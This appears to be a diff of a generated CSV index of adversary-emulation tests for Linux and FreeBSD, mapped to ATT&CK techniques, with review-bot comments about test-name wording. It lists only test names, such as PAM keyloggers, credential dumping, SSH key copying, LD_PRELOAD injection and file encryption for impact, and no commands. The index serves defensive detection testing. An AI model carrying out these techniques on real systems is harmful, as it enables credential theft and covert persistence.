persistence,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
persistence,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
persistence,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
command-and-control,T1132.001,Data Encoding: Standard Encoding,2,Base64 Encoded data (freebsd),2d97c626-7652-449e-a986-b02d9051c298,sh
command-and-control,T1090.003,Proxy: Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
command-and-control,T1090.003,Proxy: Multi-hop Proxy,5,Tor Proxy Usage - FreeBSD,550ec67d-a99e-408b-816a-689271b27d2a,sh
command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
command-and-control,T1071.001,Application Layer Protocol: Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
command-and-control,T1105,Ingress Tool Transfer,1,rsync remote file copy (push),0fc6e977-cb12-44f6-b263-2824ba917409,sh
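Review bot: three Test Names in this hunk need a wording fix: T1546.004 test 5 "Append commands user shell profile" is missing "to" (compare test 4, "Append to the system shell profile"); T1543.002 test 3 "Create Systemd Service file, Enable the service , Modify and Reload the service." has a space before the second comma and a trailing period; and T1053.002 test 3 "At - Schedule a job freebsd" drops the parentheses every other FreeBSD variant uses, so "At - Schedule a job (freebsd)" would match test 2's Linux counterpart.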
@@ -162,31 +217,44 @@ collection,T1560.001,Archive Collected Data: Archive via Utility,7,Data Compress
collection,T1560.001,Archive Collected Data: Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,9,Encrypts collected data with AES-256 and Base64,a743e3a6-e8b2-4a30-abe7-ca85d201b5d3,bash
collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
collection,T1113,Screen Capture,4,X Windows Capture (freebsd),562f3bc2-74e8-46c5-95c7-0e01f9ccc65c,sh
collection,T1113,Screen Capture,5,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
collection,T1113,Screen Capture,6,Capture Linux Desktop using Import Tool (freebsd),18397d87-38aa-4443-a098-8a48a8ca5d8d,sh
collection,T1056.001,Input Capture: Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
collection,T1056.001,Input Capture: Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
collection,T1056.001,Input Capture: Keylogging,4,Logging sh history to syslog/messages,b04284dc-3bd9-4840-8d21-61b8d31c99f2,sh
collection,T1056.001,Input Capture: Keylogging,5,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,bash
collection,T1056.001,Input Capture: Keylogging,6,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
collection,T1056.001,Input Capture: Keylogging,7,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
collection,T1074.001,Data Staged: Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
collection,T1074.001,Data Staged: Local Data Staging,3,Stage data from Discovery.sh (freebsd),4fca7b49-379d-4493-8890-d6297750fa46,sh
collection,T1115,Clipboard Data,5,Add or copy content to clipboard with xClip,ee363e53-b083-4230-aff3-f8d955f2d5bb,sh
collection,T1560.002,Archive Collected Data: Archive via Library,1,Compressing data using GZip in Python (FreeBSD/Linux),391f5298-b12d-4636-8482-35d9c17d53a8,sh
collection,T1560.002,Archive Collected Data: Archive via Library,2,Compressing data using bz2 in Python (FreeBSD/Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,sh
collection,T1560.002,Archive Collected Data: Archive via Library,3,Compressing data using zipfile in Python (FreeBSD/Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,sh
collection,T1560.002,Archive Collected Data: Archive via Library,4,Compressing data using tarfile in Python (FreeBSD/Linux),e86f1b4b-fcc1-4a2a-ae10-b49da01458db,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Sudo usage (freebsd),2bf9a018-4664-438a-b435-cc6f8c6f71b1,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,4,Unlimited sudo cache timeout (freebsd),a83ad6e8-6f24-4d7f-8f44-75f8ab742991,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,5,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,6,Disable tty_tickets for sudo caching (freebsd),4df6a0fe-2bdd-4be8-8618-a6a19654a57a,sh
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,sh
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /etc/cron.d folder,078e69eb-d9fb-450e-b9d0-2e118217c846,sh
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,4,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
privilege-escalation,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
privilege-escalation,T1546.005,Event Triggered Execution: Trap,2,Trap EXIT (freebsd),be1a5d70-6865-44aa-ab50-42244c9fd16f,sh
privilege-escalation,T1546.005,Event Triggered Execution: Trap,3,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
privilege-escalation,T1546.005,Event Triggered Execution: Trap,4,Trap SIGINT (freebsd),ade10242-1eac-43df-8412-be0d4c704ada,sh
privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Make and modify binary from C source (freebsd),dd580455-d84b-481b-b8b0-ac96f3b1dc4c,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,4,Set a SetUID flag on file (freebsd),9be9b827-ff47-4e1b-bef8-217db6fb7283,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,5,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,6,Set a SetGID flag on file (freebsd),1f73af33-62a8-4bf1-bd10-3bea931f2c0d,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,7,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,8,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,9,Do reconnaissance for files that have the setuid bit set,8e36da01-cd29-45fd-be72-8a0fcaad4481,sh
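Review bot: the platform suffix in the Test Name column is spelled inconsistently within this hunk: the FreeBSD variants use lower-case "(freebsd)" (`Sudo usage (freebsd)`, `Trap EXIT (freebsd)`, `Set a SetUID flag on file (freebsd)`) while other rows use "(FreeBSD/Linux)" (`Compressing data using GZip in Python (FreeBSD/Linux)`). Since this CSV is an index generated from the atomic test YAML, the names should be normalised to one spelling ("FreeBSD") in the source tests so the regenerated index stays consistent and searchable.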
@@ -197,31 +265,45 @@ privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a use
privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,3,Add command to .shrc,41502021-591a-4649-8b6e-83c9192aff53,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,4,Append to the system shell profile,694b3cc8-6a78-4d35-9e74-0123d009e94b,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,5,Append commands user shell profile,bbdb06bc-bab6-4f5b-8232-ba3fbed51d77,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,6,System shell profile scripts,8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,7,Create/Append to .bash_logout,37ad2f24-7c53-4a50-92da-427a4ad13f58,bash
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,4,rc.local (FreeBSD),2015fb48-8ab6-4fbf-928b-0b62de5c9476,sh
privilege-escalation,T1543.002,Create or Modify System Process: SysV/Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
privilege-escalation,T1543.002,Create or Modify System Process: SysV/Systemd Service,2,Create SysV Service,760fe8d2-79d9-494f-905e-a239a3df86f6,sh
privilege-escalation,T1543.002,Create or Modify System Process: SysV/Systemd Service,3,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
privilege-escalation,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
privilege-escalation,T1053.002,Scheduled Task/Job: At,3,At - Schedule a job freebsd,549863fb-1c91-467e-97fc-1fa32b9f356b,sh
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM rule (freebsd),b17eacac-282d-4ca8-a240-46602cf863e3,sh
credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,3,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
credential-access,T1056.001,Input Capture: Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
credential-access,T1056.001,Input Capture: Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
credential-access,T1056.001,Input Capture: Keylogging,4,Logging sh history to syslog/messages,b04284dc-3bd9-4840-8d21-61b8d31c99f2,sh
credential-access,T1056.001,Input Capture: Keylogging,5,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,bash
credential-access,T1056.001,Input Capture: Keylogging,6,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
credential-access,T1056.001,Input Capture: Keylogging,7,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO Brute Force - Debian,ba1bf0b6-f32b-4db0-b7cc-d78cacc76700,bash
credential-access,T1110.001,Brute Force: Password Guessing,6,SUDO Brute Force - Redhat,4097bc00-5eeb-4d56-aaf9-287d60351d95,bash
credential-access,T1110.001,Brute Force: Password Guessing,7,SUDO Brute Force - FreeBSD,abcde488-e083-4ee7-bc85-a5684edd7541,bash
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,2,Dump individual process memory with sh on FreeBSD (Local),fa37b633-e097-4415-b2b8-c5bf4c86e423,sh
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,3,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,4,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash
credential-access,T1040,Network Sniffing,1,Packet Capture Linux using tshark or tcpdump,7fe741f7-b265-4951-a7c7-320889083b3e,bash
credential-access,T1040,Network Sniffing,2,Packet Capture FreeBSD using tshark or tcpdump,c93f2492-9ebe-44b5-8b45-36574cccfe67,sh
credential-access,T1040,Network Sniffing,10,Packet Capture FreeBSD using /dev/bpfN with sudo,e2028771-1bfb-48f5-b5e6-e50ee0942a14,sh
credential-access,T1040,Network Sniffing,11,Filtered Packet Capture FreeBSD using /dev/bpfN with sudo,a3a0d4c9-c068-4563-a08d-583bd05b884c,sh
credential-access,T1040,Network Sniffing,12,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo",10c710c9-9104-4d5f-8829-5b65391e2a29,bash
credential-access,T1040,Network Sniffing,13,"Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo",7a0895f0-84c1-4adf-8491-a21510b1d4c1,bash
credential-access,T1040,Network Sniffing,14,"Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo",515575ab-d213-42b1-aa64-ef6a2dd4641b,bash
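Review bot: two Test Name values in this hunk read as if a word is missing: `Append commands user shell profile` (test #5 of T1546.004, presumably "Append commands to user shell profile") and `At - Schedule a job freebsd` (test #3 of T1053.002, which lacks the parenthesised "(freebsd)" suffix every other FreeBSD variant in the index uses). Both should be corrected in the test YAML so the regenerated index picks the fix up.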
@@ -230,14 +312,20 @@ credential-access,T1552,Unsecured Credentials,1,AWS - Retrieve EC2 Password Data
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,9,LaZagne.py - Dump Credentials from Firefox Browser,87e88698-621b-4c45-8a89-4eaebdeaabb1,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,4,Copy Private SSH Keys with CP (freebsd),12e4a260-a7fd-4ed8-bf18-1a28c1395775,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,5,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,6,Copy Private SSH Keys with rsync (freebsd),922b1080-0b95-42b0-9585-b9a5ea0af044,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,7,Copy the users GnuPG directory with rsync,2a5a0601-f5fb-4e2e-aa09-73282ae6afca,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,8,Copy the users GnuPG directory with rsync (freebsd),b05ac39b-515f-48e9-88e9-2f141b5bcad0,sh
credential-access,T1552.003,Unsecured Credentials: Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
credential-access,T1552.003,Unsecured Credentials: Bash History,2,Search Through sh History,d87d3b94-05b4-40f2-a80f-99864ffa6803,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,1,Find AWS credentials,2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,3,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,6,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
credential-access,T1110.004,Brute Force: Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash
credential-access,T1110.004,Brute Force: Credential Stuffing,3,SSH Credential Stuffing From FreeBSD,a790d50e-7ebf-48de-8daa-d9367e0911d4,sh
credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",1,Access /etc/shadow (Local),3723ab77-c546-403c-8fb4-bb577033b235,bash
credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",2,Access /etc/master.passwd (Local),5076874f-a8e6-4077-8ace-9e5ab54114a5,sh
credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",3,Access /etc/passwd (Local),60e860b6-8ae6-49db-ad07-5e73edd88f5d,sh
credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",4,"Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat",df1a55ae-019d-4120-bc35-94f4bc5c4b0a,sh
credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",5,"Access /etc/{shadow,passwd,master.passwd} with shell builtins",f5aa6543-6cb2-4fae-b9c2-b96e14721713,sh
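Review bot: `Copy the users GnuPG directory with rsync` (tests #7 and #8 of T1552.004) should read "user's"; since this index is generated, the correction belongs in the test YAML, not in the CSV.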
@@ -248,30 +336,42 @@ discovery,T1087.001,Account Discovery: Local Account,2,View sudoers access,fed9b
discovery,T1087.001,Account Discovery: Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
discovery,T1087.001,Account Discovery: Local Account,4,List opened files by user,7e46c7a5-0142-45be-a858-1a3ecb4fd3cb,sh
discovery,T1087.001,Account Discovery: Local Account,5,Show if a user account has ever logged in remotely,0f0b6a29-08c3-44ad-a30b-47fd996b2110,sh
discovery,T1087.001,Account Discovery: Local Account,6,Show if a user account has ever logged in remotely (freebsd),0f73418f-d680-4383-8a24-87bc97fe4e35,sh
discovery,T1087.001,Account Discovery: Local Account,7,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (FreeBSD),e129d73b-3e03-4ae9-bf1e-67fc8921e0fd,sh
discovery,T1069.002,Permission Groups Discovery: Domain Groups,15,Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS,d58d749c-4450-4975-a9e9-8b1d562755c2,sh
discovery,T1007,System Service Discovery,3,System Service Discovery - systemctl,f4b26bce-4c2c-46c0-bcc5-fce062d38bef,bash
discovery,T1007,System Service Discovery,4,System Service Discovery - service,b2e1c734-7336-40f9-b970-b04731cbaf8a,sh
discovery,T1040,Network Sniffing,1,Packet Capture Linux using tshark or tcpdump,7fe741f7-b265-4951-a7c7-320889083b3e,bash
discovery,T1040,Network Sniffing,2,Packet Capture FreeBSD using tshark or tcpdump,c93f2492-9ebe-44b5-8b45-36574cccfe67,sh
discovery,T1040,Network Sniffing,10,Packet Capture FreeBSD using /dev/bpfN with sudo,e2028771-1bfb-48f5-b5e6-e50ee0942a14,sh
discovery,T1040,Network Sniffing,11,Filtered Packet Capture FreeBSD using /dev/bpfN with sudo,a3a0d4c9-c068-4563-a08d-583bd05b884c,sh
discovery,T1040,Network Sniffing,12,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo",10c710c9-9104-4d5f-8829-5b65391e2a29,bash
discovery,T1040,Network Sniffing,13,"Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo",7a0895f0-84c1-4adf-8491-a21510b1d4c1,bash
discovery,T1040,Network Sniffing,14,"Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo",515575ab-d213-42b1-aa64-ef6a2dd4641b,bash
discovery,T1040,Network Sniffing,15,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo",b1cbdf8b-6078-48f5-a890-11ea19d7f8e9,bash
discovery,T1135,Network Share Discovery,2,Network Share Discovery - linux,875805bc-9e86-4e87-be86-3a5527315cae,bash
discovery,T1135,Network Share Discovery,3,Network Share Discovery - FreeBSD,77e468a6-3e5c-45a1-9948-c4b5603747cb,sh
discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh
discovery,T1082,System Information Discovery,4,Linux VM Check via Hardware,31dad7ad-2286-4c02-ae92-274418c85fec,bash
discovery,T1082,System Information Discovery,5,Linux VM Check via Kernel Modules,8057d484-0fae-49a4-8302-4812c4f1e64e,bash
discovery,T1082,System Information Discovery,6,FreeBSD VM Check via Kernel Modules,eefe6a49-d88b-41d8-8fc2-b46822da90d3,sh
discovery,T1082,System Information Discovery,8,Hostname Discovery,486e88ea-4f56-470f-9b57-3f4d73f39133,sh
discovery,T1082,System Information Discovery,12,"Environment variables discovery on freebsd, macos and linux",fcbdd43f-f4ad-42d5-98f3-0218097e2720,sh
discovery,T1082,System Information Discovery,25,Linux List Kernel Modules,034fe21c-3186-49dd-8d5d-128b35f181c7,sh
discovery,T1082,System Information Discovery,26,FreeBSD List Kernel Modules,4947897f-643a-4b75-b3f5-bed6885749f6,sh
discovery,T1217,Browser Bookmark Discovery,1,List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux,3a41f169-a5ab-407f-9269-abafdb5da6c2,sh
discovery,T1217,Browser Bookmark Discovery,4,List Google Chromium Bookmark JSON Files on FreeBSD,88ca025b-3040-44eb-9168-bd8af22b82fa,sh
discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
discovery,T1016,System Network Configuration Discovery,4,System Network Configuration Discovery (freebsd),7625b978-4efd-47de-8744-add270374bee,sh
discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
discovery,T1049,System Network Connections Discovery,3,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
discovery,T1069.001,Permission Groups Discovery: Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh
discovery,T1201,Password Policy Discovery,1,Examine password complexity policy - Ubuntu,085fe567-ac84-47c7-ac4c-2688ce28265b,bash
discovery,T1201,Password Policy Discovery,2,Examine password complexity policy - FreeBSD,a7893624-a3d7-4aed-9676-80498f31820f,sh
discovery,T1201,Password Policy Discovery,3,Examine password complexity policy - CentOS/RHEL 7.x,78a12e65-efff-4617-bc01-88f17d71315d,bash
discovery,T1201,Password Policy Discovery,4,Examine password complexity policy - CentOS/RHEL 6.x,6ce12552-0adb-4f56-89ff-95ce268f6358,bash
discovery,T1201,Password Policy Discovery,5,Examine password expiration policy - All Linux,7c86c55c-70fa-4a05-83c9-3aa19b145d1a,bash
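Review bot: `Nix File and Directory Discovery 2` (test #4 of T1083) is not a descriptive name; nothing in the index distinguishes it from test #3 except the number. Suggest naming it after the command or variation it exercises, in the test YAML, so the generated index stays self-explanatory.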
@@ -280,13 +380,16 @@ discovery,T1614.001,System Location Discovery: System Language Discovery,4,Disco
discovery,T1614.001,System Location Discovery: System Language Discovery,5,Discover System Language by locale file,5d7057c9-2c8a-4026-91dd-13b5584daa69,sh
discovery,T1614.001,System Location Discovery: System Language Discovery,6,Discover System Language by Environment Variable Query,cb8f7cdc-36c4-4ed0-befc-7ad7d24dfd7a,sh
discovery,T1518.001,Software Discovery: Security Software Discovery,4,Security Software Discovery - ps (Linux),23b91cd2-c99c-4002-9e41-317c63e024a2,sh
discovery,T1518.001,Software Discovery: Security Software Discovery,5,Security Software Discovery - pgrep (FreeBSD),fa96c21c-5fd6-4428-aa28-51a2fbecdbdc,sh
discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
discovery,T1018,Remote System Discovery,12,Remote System Discovery - ip neighbour,158bd4dd-6359-40ab-b13c-285b9ef6fa25,sh
discovery,T1018,Remote System Discovery,13,Remote System Discovery - ip route,1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1,sh
discovery,T1018,Remote System Discovery,14,Remote System Discovery - netstat,d2791d72-b67f-4615-814f-ec824a91f514,sh
discovery,T1018,Remote System Discovery,15,Remote System Discovery - ip tcp_metrics,6c2da894-0b57-43cb-87af-46ea3b501388,sh
discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
discovery,T1046,Network Service Discovery,3,Port Scan Nmap for FreeBSD,f03d59dc-0e3b-428a-baeb-3499552c7048,sh
impact,T1531,Account Access Removal,4,Change User Password via passwd,3c717bf3-2ecc-4d79-8ac8-0bfbf08fbce6,sh
impact,T1486,Data Encrypted for Impact,1,Encrypt files using gpg (FreeBSD/Linux),7b8ce084-3922-4618-8d22-95f996173765,sh
impact,T1486,Data Encrypted for Impact,2,Encrypt files using 7z (FreeBSD/Linux),53e6735a-4727-44cc-b35b-237682a151ad,sh
@@ -298,11 +401,14 @@ impact,T1529,System Shutdown/Reboot,3,Restart System via `shutdown` - FreeBSD/ma
impact,T1529,System Shutdown/Reboot,4,Shutdown System via `shutdown` - FreeBSD/macOS/Linux,4963a81e-a3ad-4f02-adda-812343b351de,sh
impact,T1529,System Shutdown/Reboot,5,Restart System via `reboot` - FreeBSD/macOS/Linux,47d0b042-a918-40ab-8cf9-150ffe919027,sh
impact,T1529,System Shutdown/Reboot,6,Shutdown System via `halt` - FreeBSD/Linux,918f70ab-e1ef-49ff-bc57-b27021df84dd,sh
impact,T1529,System Shutdown/Reboot,7,Reboot System via `halt` - FreeBSD,7b1cee42-320f-4890-b056-d65c8b884ba5,sh
impact,T1529,System Shutdown/Reboot,8,Reboot System via `halt` - Linux,78f92e14-f1e9-4446-b3e9-f1b921f2459e,bash
impact,T1529,System Shutdown/Reboot,9,Shutdown System via `poweroff` - FreeBSD/Linux,73a90cd2-48a2-4ac5-8594-2af35fa909fa,sh
impact,T1529,System Shutdown/Reboot,10,Reboot System via `poweroff` - FreeBSD,5a282e50-86ff-438d-8cef-8ae01c9e62e1,sh
impact,T1529,System Shutdown/Reboot,11,Reboot System via `poweroff` - Linux,61303105-ff60-427b-999e-efb90b314e41,bash
execution,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,sh
execution,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
